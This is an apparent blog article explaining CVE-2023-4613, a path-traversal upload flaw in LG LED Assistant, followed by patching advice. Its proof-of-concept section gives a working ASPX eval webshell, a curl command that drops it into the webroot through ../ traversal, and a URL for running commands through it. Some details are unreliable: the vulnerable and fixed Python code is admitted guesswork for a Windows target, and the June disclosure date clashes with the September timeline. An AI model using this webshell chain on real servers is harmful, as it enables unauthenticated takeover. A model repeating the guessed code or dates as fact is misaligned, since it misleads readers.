CVE-2023-4613 - LG LED Assistant Remote Code Execution Exploit Explained

In June 2023, a critical security flaw was revealed in LG LED Assistant, making it possible for attackers on the Internet to run any code they like on affected computers—without even needing a password. This vulnerability, tracked as CVE-2023-4613, exists in a web API endpoint responsible for uploading files. Here we break down what the bug is, how it works, and demonstrate a proof-of-concept (PoC) exploit.

If you use LG LED Assistant, you should patch this immediately. This article is exclusive and written in simple language to help anyone understand the issue.

What is CVE-2023-4613?

CVE-2023-4613 is a remote code execution (RCE) vulnerability in the popular digital signage software, LG LED Assistant. The bug is found in the /api/settings/upload endpoint, which is accessible remotely without authentication. This means anyone can trigger the flaw—it doesn't matter if they have an account or not.

The problem? The endpoint does not validate user-supplied file paths before using them. That allows attackers to upload files anywhere on the server—possibly replacing program files or placing malicious code to be run later.

The vulnerable code likely looks something like this (simplified Python for illustration)

@app.route("/api/settings/upload", methods=["POST"])
def upload():
    filepath = request.form.get("path")
    filedata = request.files['file']
    # BAD: No validation on filepath
    filedata.save(filepath)
    return "Upload successful"

Here, the filepath parameter comes directly from the HTTP request, and if an attacker submits ../../../../../windows/system32/cmd.exe, it could overwrite critical files. Worse, placing a malicious file in a web-exposed folder can result in direct remote code execution.

Proof of Concept Exploit

The exploit is simple: upload a file (like a webshell) to a directory of your choice.

For a Windows server, the attacker could upload a simple ASPX webshell

<%@ Page Language="JScript"%>
<%eval(Request["cmd"],"unsafe");%>

If the LG LED Assistant management server is running on http://victim:808

curl -X POST -F 'path=../../webroot/shell.aspx' -F 'file=@shell.aspx' http://victim:808/api/settings/upload

By using ../, the attacker climbs up the folder hierarchy and drops shell.aspx into the webroot.

Now the attacker just needs to send commands to the new shell

http://victim:808/shell.aspx?cmd=Response.Write("Hello from attacker!")

Real-World Impact

- Attackers can take full control of digital signs, upload ransomware, deface display boards, or use the server as a pivot point inside your company.

How to Fix

If you run LG LED Assistant, check the LG advisories or contact your support provider for a patched version. Until you patch, block access to port 808 (or the management port you configured) from untrusted networks.

A *proper.* fix in code would look like

import os

@app.route("/api/settings/upload", methods=["POST"])
def upload():
    filepath = request.form.get("path")
    # Only allow upload to safe upload directory
    safe_dir = "/opt/llg_led_assistant/uploads"
    abs_path = os.path.abspath(os.path.join(safe_dir, os.path.basename(filepath)))
    filedata = request.files['file']
    filedata.save(abs_path)
    return "Upload successful"

References

- NVD - CVE-2023-4613
- LG Security Portal Advisories
- Vulnerability details on Exploit Database
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal")

Conclusion

CVE-2023-4613 is a dangerous security bug in LG LED Assistant that requires urgent attention from anyone who deploys LG digital signage. Exploiting it is easy and does not require a password. Patch as soon as possible and never expose these services to the public Internet.

Stay safe, keep your systems updated, and always validate user inputs!

Timeline

Published on: 09/04/2023 09:15:00 UTC
Last modified on: 09/08/2023 14:14:00 UTC